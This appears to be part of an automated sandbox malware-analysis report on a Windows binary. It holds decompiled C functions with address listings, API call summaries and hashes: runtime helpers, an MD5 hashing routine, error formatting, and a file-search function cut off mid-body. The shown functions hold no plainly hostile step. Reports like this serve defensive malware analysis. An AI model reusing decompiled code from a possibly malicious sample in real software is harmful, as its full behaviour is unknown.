                                                                                                    0x0040ef70
                                                                                                    0x0040ef72
                                                                                                    0x0040ef75
                                                                                                    0x0040ef7a
                                                                                                    0x0040ef80
                                                                                                    0x0040ef85
                                                                                                    0x0040ef93
                                                                                                    0x0040ef9b
                                                                                                    0x0040efa7
                                                                                                    0x0040efb3
                                                                                                    0x0040efb8
                                                                                                    0x0040efb8
                                                                                                    0x0040efb8
                                                                                                    0x0040efba
                                                                                                    0x0040efbc
                                                                                                    0x0040efc0
                                                                                                    0x0040efc5
                                                                                                    0x0040efc9
                                                                                                    0x0040efca
                                                                                                    0x0040efd1
                                                                                                    0x0040efd2
                                                                                                    0x0040efd4
                                                                                                    0x0040efd7
                                                                                                    0x0040ef80
                                                                                                    0x0040efe2

                                                                                                    APIs
                                                                                                    • _malloc.LIBCMT ref: 0040EF69
                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                    • _malloc.LIBCMT ref: 0040EF85
                                                                                                    • _memset.LIBCMT ref: 0040EF9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$AllocateHeap_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3655941445-0
                                                                                                    • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                    • Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
                                                                                                    • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                    • Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1075 42fb64-42fb77 call 428520 1078 42fba5-42fbaa call 428565 1075->1078 1079 42fb79-42fb8c call 428af7 1075->1079 1084 42fb99-42fba0 call 42fbab 1079->1084 1085 42fb8e call 42fe47 1079->1085 1084->1078 1088 42fb93 1085->1088 1088->1084
                                                                                                    C-Code - Quality: 80%
                                                                                                    			E0042FB64(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                    				void* _t4;
                                                                                                    				void* _t13;
                                                                                                    
                                                                                                    				_push(8);
                                                                                                    				_push(0x507df0);
                                                                                                    				_t4 = E00428520(__ebx, __edi, __esi);
                                                                                                    				if( *0x51106c == 0) {
                                                                                                    					E00428AF7(6);
                                                                                                    					 *(_t13 - 4) =  *(_t13 - 4) & 0x00000000;
                                                                                                    					_t16 =  *0x51106c;
                                                                                                    					if( *0x51106c == 0) {
                                                                                                    						E0042FE47(__ebx, __edx, __edi, __esi, _t16); // executed
                                                                                                    						 *0x51106c =  *0x51106c + 1;
                                                                                                    					}
                                                                                                    					 *(_t13 - 4) = 0xfffffffe;
                                                                                                    					_t4 = E0042FBAB();
                                                                                                    				}
                                                                                                    				return E00428565(_t4);
                                                                                                    			}





                                                                                                    0x0042fb64
                                                                                                    0x0042fb66
                                                                                                    0x0042fb6b
                                                                                                    0x0042fb77
                                                                                                    0x0042fb7b
                                                                                                    0x0042fb81
                                                                                                    0x0042fb85
                                                                                                    0x0042fb8c
                                                                                                    0x0042fb8e
                                                                                                    0x0042fb93
                                                                                                    0x0042fb93
                                                                                                    0x0042fb99
                                                                                                    0x0042fba0
                                                                                                    0x0042fba0
                                                                                                    0x0042fbaa

                                                                                                    APIs
                                                                                                    • __lock.LIBCMT ref: 0042FB7B
                                                                                                      • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                      • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                                    • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                      • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                      • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                      • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                      • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                      • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                      • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __lock$CriticalEnterSection____lc_codepage_func__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 360932542-0
                                                                                                    • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                    • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                    • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                    • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1089 427f3d-427f47 call 427e0e 1091 427f4c-427f50 1089->1091
                                                                                                    C-Code - Quality: 25%
                                                                                                    			E00427F3D(intOrPtr _a4) {
                                                                                                    				void* __ebp;
                                                                                                    				void* _t2;
                                                                                                    				void* _t3;
                                                                                                    				void* _t4;
                                                                                                    				void* _t5;
                                                                                                    				void* _t8;
                                                                                                    
                                                                                                    				_push(0);
                                                                                                    				_push(0);
                                                                                                    				_push(_a4);
                                                                                                    				_t2 = E00427E0E(_t3, _t4, _t5, _t8); // executed
                                                                                                    				return _t2;
                                                                                                    			}









                                                                                                    0x00427f40
                                                                                                    0x00427f42
                                                                                                    0x00427f44
                                                                                                    0x00427f47
                                                                                                    0x00427f50

                                                                                                    APIs
                                                                                                    • _doexit.LIBCMT ref: 00427F47
                                                                                                      • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                      • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 3712619029-0
                                                                                                    • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                    • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                    • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                    • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 62%
                                                                                                    			E00410FC0(CHAR* __ecx, CHAR** __edx) {
                                                                                                    				int _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				intOrPtr _v20;
                                                                                                    				signed int _v24;
                                                                                                    				int _v28;
                                                                                                    				long* _v32;
                                                                                                    				int _v36;
                                                                                                    				char _v40;
                                                                                                    				char _v44;
                                                                                                    				int _v48;
                                                                                                    				char _v52;
                                                                                                    				char _v56;
                                                                                                    				char _v68;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				long** _t40;
                                                                                                    				int* _t41;
                                                                                                    				int _t42;
                                                                                                    				char _t44;
                                                                                                    				char _t50;
                                                                                                    				void* _t72;
                                                                                                    				CHAR** _t73;
                                                                                                    				void* _t80;
                                                                                                    				int _t81;
                                                                                                    				void* _t83;
                                                                                                    				CHAR* _t84;
                                                                                                    				intOrPtr* _t85;
                                                                                                    				void* _t87;
                                                                                                    				intOrPtr _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				void* _t92;
                                                                                                    				void* _t93;
                                                                                                    
                                                                                                    				_t79 = __edx;
                                                                                                    				 *[fs:0x0] = _t89;
                                                                                                    				_t90 = _t89 - 0x34;
                                                                                                    				_v20 = _t90;
                                                                                                    				_t40 =  &_v32;
                                                                                                    				_t73 = __edx;
                                                                                                    				_v32 = 0;
                                                                                                    				_t84 = __ecx;
                                                                                                    				_v28 = 0;
                                                                                                    				_v36 = 0;
                                                                                                    				_v8 = 0;
                                                                                                    				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
                                                                                                    				if(_t40 == 0) {
                                                                                                    					_v40 = _t40;
                                                                                                    					E00430ECA( &_v40, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t41 =  &_v28;
                                                                                                    				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
                                                                                                    				if(_t41 == 0) {
                                                                                                    					_v44 = _t41;
                                                                                                    					E00430ECA( &_v44, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t42 = lstrlenA(_t84);
                                                                                                    				__imp__CryptHashData(_v28, _t84, _t42, 0);
                                                                                                    				if(_t42 == 0) {
                                                                                                    					_v48 = _t42;
                                                                                                    					E00430ECA( &_v48, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t85 = __imp__CryptGetHashParam;
                                                                                                    				_v24 = 0;
                                                                                                    				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
                                                                                                    				_t98 = _t44;
                                                                                                    				if(_t44 == 0) {
                                                                                                    					_v52 = _t44;
                                                                                                    					E00430ECA( &_v52, 0x5085b8);
                                                                                                    				}
                                                                                                    				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
                                                                                                    				_v36 = _t81;
                                                                                                    				E0042B420(_t81, 0, _v24 + 1);
                                                                                                    				_t92 = _t90 + 0x10;
                                                                                                    				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
                                                                                                    				if(_t50 == 0) {
                                                                                                    					_v56 = _t50;
                                                                                                    					E00430ECA( &_v56, 0x5085b8);
                                                                                                    				}
                                                                                                    				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
                                                                                                    				E0042B420(_t52, 0, 0x14 + _v24 * 2);
                                                                                                    				_t87 = 0;
                                                                                                    				_t93 = _t92 + 0x10;
                                                                                                    				if(_v24 > 0) {
                                                                                                    					do {
                                                                                                    						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
                                                                                                    						_t93 = _t93 + 0xc;
                                                                                                    						lstrcatA( *_t73,  &_v68);
                                                                                                    						_t87 = _t87 + 1;
                                                                                                    					} while (_t87 < _v24);
                                                                                                    				}
                                                                                                    				E00422110(_t81);
                                                                                                    				__imp__CryptDestroyHash(_v28);
                                                                                                    				CryptReleaseContext(_v32, 0);
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return 1;
                                                                                                    			}



































                                                                                                    0x00410fc0
                                                                                                    0x00410fd1
                                                                                                    0x00410fd8
                                                                                                    0x00410fde
                                                                                                    0x00410fe1
                                                                                                    0x00410ff0
                                                                                                    0x00410ff2
                                                                                                    0x00410ff9
                                                                                                    0x00410ffb
                                                                                                    0x00411002
                                                                                                    0x00411009
                                                                                                    0x00411010
                                                                                                    0x00411018
                                                                                                    0x0041101a
                                                                                                    0x00411026
                                                                                                    0x00411026
                                                                                                    0x0041102b
                                                                                                    0x0041103b
                                                                                                    0x00411043
                                                                                                    0x00411045
                                                                                                    0x00411051
                                                                                                    0x00411051
                                                                                                    0x00411059
                                                                                                    0x00411064
                                                                                                    0x0041106c
                                                                                                    0x0041106e
                                                                                                    0x0041107a
                                                                                                    0x0041107a
                                                                                                    0x0041107f
                                                                                                    0x00411092
                                                                                                    0x00411099
                                                                                                    0x0041109b
                                                                                                    0x0041109d
                                                                                                    0x0041109f
                                                                                                    0x004110ab
                                                                                                    0x004110ab
                                                                                                    0x004110c1
                                                                                                    0x004110c3
                                                                                                    0x004110ca
                                                                                                    0x004110cf
                                                                                                    0x004110de
                                                                                                    0x004110e2
                                                                                                    0x004110e4
                                                                                                    0x004110f0
                                                                                                    0x004110f0
                                                                                                    0x00411109
                                                                                                    0x0041110b
                                                                                                    0x00411110
                                                                                                    0x00411112
                                                                                                    0x00411118
                                                                                                    0x00411120
                                                                                                    0x0041112e
                                                                                                    0x00411133
                                                                                                    0x0041113c
                                                                                                    0x00411142
                                                                                                    0x00411143
                                                                                                    0x00411120
                                                                                                    0x00411149
                                                                                                    0x00411154
                                                                                                    0x0041115f
                                                                                                    0x0041116a
                                                                                                    0x00411177

                                                                                                    APIs
                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                    • _memset.LIBCMT ref: 004110CA
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                    • _malloc.LIBCMT ref: 00411100
                                                                                                    • _memset.LIBCMT ref: 0041110B
                                                                                                    • _sprintf.LIBCMT ref: 0041112E
                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                    • String ID: %.2X
                                                                                                    • API String ID: 2451520719-213608013
                                                                                                    • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                    • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                    • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                    • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00411900(WCHAR* __ecx, long __edx, WCHAR* _a4) {
                                                                                                    				short _v8;
                                                                                                    				WCHAR* _v12;
                                                                                                    				short _v2060;
                                                                                                    				int _t15;
                                                                                                    				long _t36;
                                                                                                    				void* _t44;
                                                                                                    				WCHAR* _t48;
                                                                                                    
                                                                                                    				_t36 = __edx;
                                                                                                    				_v12 = __ecx;
                                                                                                    				if(__edx == 0) {
                                                                                                    					_t36 = GetLastError();
                                                                                                    				}
                                                                                                    				FormatMessageW(0x1300, 0, _t36, 0x400,  &_v8, 0, 0);
                                                                                                    				_t15 = lstrlenW(_v8);
                                                                                                    				_t44 = LocalAlloc(0x40, 0x50 + (_t15 + lstrlenW(_v12)) * 2);
                                                                                                    				lstrcpyW(_t44, _v12);
                                                                                                    				lstrcatW(_t44, L" failed with error ");
                                                                                                    				E00412AC0(_t36,  &_v2060);
                                                                                                    				lstrcatW(_t44,  &_v2060);
                                                                                                    				lstrcatW(_t44, L": ");
                                                                                                    				lstrcatW(_t44, _v8);
                                                                                                    				_t48 = _a4;
                                                                                                    				if(_t48 == 0) {
                                                                                                    					MessageBoxW(0, _t44, 0, 0);
                                                                                                    				} else {
                                                                                                    					if(lstrlenW(_t44) < 0x400) {
                                                                                                    						lstrcpynW(_t48, _t44, 0x400);
                                                                                                    						E00412BA0(_t48);
                                                                                                    					} else {
                                                                                                    						E0042B420(_t48, 0, 0x800);
                                                                                                    						E0042D8D0(_t48, _t44, 0x7fe);
                                                                                                    						E00412BA0(_t48);
                                                                                                    					}
                                                                                                    				}
                                                                                                    				LocalFree(_v8);
                                                                                                    				return LocalFree(_t44);
                                                                                                    			}










                                                                                                    0x0041190a
                                                                                                    0x0041190c
                                                                                                    0x00411913
                                                                                                    0x0041191b
                                                                                                    0x0041191b
                                                                                                    0x00411932
                                                                                                    0x00411941
                                                                                                    0x0041195f
                                                                                                    0x00411962
                                                                                                    0x00411974
                                                                                                    0x0041197e
                                                                                                    0x0041198b
                                                                                                    0x00411993
                                                                                                    0x00411999
                                                                                                    0x0041199b
                                                                                                    0x004119a0
                                                                                                    0x004119f2
                                                                                                    0x004119a2
                                                                                                    0x004119ae
                                                                                                    0x004119dc
                                                                                                    0x004119e4
                                                                                                    0x004119b0
                                                                                                    0x004119b8
                                                                                                    0x004119c4
                                                                                                    0x004119ce
                                                                                                    0x004119ce
                                                                                                    0x004119ae
                                                                                                    0x00411a01
                                                                                                    0x00411a0c

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32 ref: 00411915
                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                    • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                    • lstrcpyW.KERNEL32 ref: 00411962
                                                                                                    • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                    • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                    • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                    • _memset.LIBCMT ref: 004119B8
                                                                                                    • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                      • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                    • String ID: failed with error
                                                                                                    • API String ID: 4182478520-946485432
                                                                                                    • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                    • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                    • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                    • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 78%
                                                                                                    			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
                                                                                                    				signed int _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				char _v17;
                                                                                                    				signed int _v24;
                                                                                                    				signed int _v28;
                                                                                                    				signed int _v32;
                                                                                                    				char _v48;
                                                                                                    				void* _v52;
                                                                                                    				intOrPtr _v56;
                                                                                                    				signed int _v60;
                                                                                                    				signed int _v64;
                                                                                                    				signed int _v80;
                                                                                                    				signed int _v84;
                                                                                                    				signed int _v88;
                                                                                                    				WCHAR* _v92;
                                                                                                    				short _v104;
                                                                                                    				signed int _v108;
                                                                                                    				signed int _v112;
                                                                                                    				char _v128;
                                                                                                    				signed int _v132;
                                                                                                    				signed int _v136;
                                                                                                    				short _v152;
                                                                                                    				char _v156;
                                                                                                    				signed int _v160;
                                                                                                    				signed int _v164;
                                                                                                    				short _v180;
                                                                                                    				intOrPtr _v184;
                                                                                                    				char _v204;
                                                                                                    				struct _WIN32_FIND_DATAW _v796;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				intOrPtr _t305;
                                                                                                    				intOrPtr _t315;
                                                                                                    				WCHAR* _t322;
                                                                                                    				void* _t323;
                                                                                                    				void* _t326;
                                                                                                    				signed int _t330;
                                                                                                    				signed int _t331;
                                                                                                    				int _t333;
                                                                                                    				signed int _t335;
                                                                                                    				signed int _t336;
                                                                                                    				intOrPtr _t340;
                                                                                                    				intOrPtr _t346;
                                                                                                    				intOrPtr* _t348;
                                                                                                    				void* _t349;
                                                                                                    				void* _t352;
                                                                                                    				intOrPtr* _t354;
                                                                                                    				void* _t355;
                                                                                                    				intOrPtr* _t356;
                                                                                                    				void* _t357;
                                                                                                    				void* _t374;
                                                                                                    				signed int _t380;
                                                                                                    				WCHAR* _t381;
                                                                                                    				WCHAR* _t392;
                                                                                                    				WCHAR* _t394;
                                                                                                    				void* _t451;
                                                                                                    				void* _t457;
                                                                                                    				signed int _t458;
                                                                                                    				signed int _t460;
                                                                                                    				WCHAR* _t461;
                                                                                                    				intOrPtr _t462;
                                                                                                    				intOrPtr _t463;
                                                                                                    				void* _t464;
                                                                                                    				intOrPtr* _t467;
                                                                                                    				signed int _t469;
                                                                                                    				intOrPtr* _t472;
                                                                                                    				signed int _t474;
                                                                                                    				char* _t481;
                                                                                                    				char* _t482;
                                                                                                    				intOrPtr* _t484;
                                                                                                    				signed int _t486;
                                                                                                    				intOrPtr* _t488;
                                                                                                    				short* _t494;
                                                                                                    				signed int _t497;
                                                                                                    				signed int _t500;
                                                                                                    				WCHAR* _t501;
                                                                                                    				short* _t502;
                                                                                                    				signed int _t507;
                                                                                                    				intOrPtr* _t515;
                                                                                                    				void* _t517;
                                                                                                    				void* _t518;
                                                                                                    				void* _t519;
                                                                                                    				intOrPtr _t523;
                                                                                                    				intOrPtr _t524;
                                                                                                    				signed int _t525;
                                                                                                    				signed int _t528;
                                                                                                    				WCHAR* _t529;
                                                                                                    				intOrPtr _t531;
                                                                                                    				void* _t537;
                                                                                                    				signed int* _t538;
                                                                                                    				void* _t540;
                                                                                                    				intOrPtr* _t541;
                                                                                                    				intOrPtr* _t542;
                                                                                                    				WCHAR* _t543;
                                                                                                    				short _t544;
                                                                                                    				intOrPtr _t545;
                                                                                                    				void* _t546;
                                                                                                    				void* _t547;
                                                                                                    				short* _t549;
                                                                                                    				void* _t550;
                                                                                                    				short* _t551;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4cab09);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t545;
                                                                                                    				_t546 = _t545 - 0x30c;
                                                                                                    				_t456 = __edx;
                                                                                                    				_v56 = __ecx;
                                                                                                    				_v24 = __edx;
                                                                                                    				_v8 = 0;
                                                                                                    				E00411AB0();
                                                                                                    				_t528 = 0;
                                                                                                    				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
                                                                                                    				_v52 = _t537;
                                                                                                    				if(_t537 == 0) {
                                                                                                    					L15:
                                                                                                    					_v108 = 7;
                                                                                                    					_v112 = 0;
                                                                                                    					_v128 = 0;
                                                                                                    					_v8 = 3;
                                                                                                    					_push(0xffffffff);
                                                                                                    					_v64 = 0;
                                                                                                    					_v80 = 0;
                                                                                                    					_v60 = 7;
                                                                                                    					E00414690(_t456,  &_v80,  &_a4, 0);
                                                                                                    					_v8 = 4;
                                                                                                    					_t457 = PathFindFileNameW;
                                                                                                    					_t302 =  >=  ? _v80 :  &_v80;
                                                                                                    					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
                                                                                                    					_v132 = 7;
                                                                                                    					_v136 = 0;
                                                                                                    					_v152 = 0;
                                                                                                    					if( *_t515 != 0) {
                                                                                                    						_t467 = _t515;
                                                                                                    						_t77 = _t467 + 2; // 0x2
                                                                                                    						_t537 = _t77;
                                                                                                    						do {
                                                                                                    							_t305 =  *_t467;
                                                                                                    							_t467 = _t467 + 2;
                                                                                                    						} while (_t305 != 0);
                                                                                                    						_t469 = _t467 - _t537 >> 1;
                                                                                                    						goto L24;
                                                                                                    					} else {
                                                                                                    						_t469 = 0;
                                                                                                    						L24:
                                                                                                    						_push(_t469);
                                                                                                    						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
                                                                                                    						_v8 = 5;
